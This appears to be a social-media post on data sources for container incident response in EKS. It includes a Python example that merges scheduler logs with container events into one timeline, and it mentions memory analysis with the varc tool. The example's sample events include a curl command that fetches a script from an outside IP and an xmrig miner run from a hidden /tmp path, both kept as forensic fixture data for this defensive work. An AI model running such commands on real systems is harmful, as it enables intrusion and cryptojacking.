Container DFIR Data Sources
Christopher Doman
Co-Founder/CTO at Cado Security - Cloud Forensics & Incident Response
In response to a question on data sources in EKS investigations -
Scheduler & Controller logs in S3
Here’s an EKS scenario where we’ve collected and parsed out the scheduler etc. logs
There’s not much in those logs for that particular scenario, but it’s useful to review them side by side with what’s happening inside the container:
Al and Paul analysed that compromise to show what you can see in each data source:
Generally, the most useful data in the scenarios we’ve tested has been inside the container, but the approach we’re taking is “collect everything whilst it’s still there, then see what you can get out of it”.
The hardest bit is merging all data-sources together and presenting the output side by side in a useful way:
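As an added example (not code from the post or from Cado's tooling), here is one minimal way to merge control-plane scheduler log lines with events recorded inside a container into a single timeline. The klog line layout is kube-scheduler's real format; the sample lines themselves and the container-side event format are constructed, and the year is supplied by the caller because klog lines do not carry it.

```python
import re
from datetime import datetime, timezone

# kube-scheduler / kube-controller-manager write klog lines: level+MMDD, UTC time,
# PID, file:line, then the message. There is no year in the line.
KLOG = re.compile(
    r"^([IWEF])(\d{2})(\d{2}) (\d{2}:\d{2}:\d{2})\.(\d{6})\s+\d+\s+[^\]]+\] (.*)$"
)

# Constructed sample: two scheduler lines as exported from the control-plane logs.
SCHEDULER_LINES = [
    'I0614 10:02:11.301122       1 schedule_one.go:252] "Successfully bound pod to node" pod="default/web-7d9c" node="ip-10-0-1-23"',
    'I0614 10:05:40.118004       1 schedule_one.go:252] "Successfully bound pod to node" pod="default/web-4f1a" node="ip-10-0-1-23"',
]
# Constructed sample: process events captured inside the container by a
# hypothetical exec collector, with ISO-8601 UTC timestamps.
CONTAINER_LINES = [
    "2024-06-14T10:03:05Z exec pid=4121 comm=curl argv=curl -s http://203.0.113.5/x.sh",
    "2024-06-14T10:03:07Z exec pid=4130 comm=xmrig argv=/tmp/.x/xmrig --config=/tmp/.x/c.json",
]

def parse_klog(line, year):
    """Return (aware UTC datetime, message) for a klog line, or None if it does not match."""
    m = KLOG.match(line)
    if not m:
        return None
    _level, month, day, hms, micros, msg = m.groups()
    ts = datetime.strptime(f"{year}-{month}-{day} {hms}.{micros}", "%Y-%m-%d %H:%M:%S.%f")
    return ts.replace(tzinfo=timezone.utc), msg

def parse_container(line):
    """Return (aware UTC datetime, message) for a 'TIMESTAMP message' event line."""
    ts_str, _, msg = line.partition(" ")
    ts = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, msg

def build_timeline(scheduler_lines, container_lines, year):
    """Merge both sources into (timestamp, source, message) tuples sorted by time."""
    events = []
    for line in scheduler_lines:
        parsed = parse_klog(line, year)
        if parsed:  # skip non-klog lines (e.g. export headers)
            events.append((parsed[0], "scheduler", parsed[1]))
    for line in container_lines:
        ts, msg = parse_container(line)
        events.append((ts, "container", msg))
    return sorted(events, key=lambda e: e[0])

if __name__ == "__main__":
    for ts, src, msg in build_timeline(SCHEDULER_LINES, CONTAINER_LINES, 2024):
        print(f"{ts.isoformat()} [{src:9}] {msg}")
```

Reading the merged output, the pod binding on the scheduler side lands a minute before the first suspicious exec inside the container, which is the kind of side-by-side view the post describes.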
Memory Analysis of Containers
We’ve open-sourced most of how we do memory in containers now - the code and some example output are at https://github.com/cado-security/varc.
It’s pretty fun to, for example, dump xmrig and see the config files it holds in memory, and it avoids the need to build memory profiles on potentially malicious infrastructure:
2 years ago
Hi Christopher, it's very interesting! I will be happy to connect.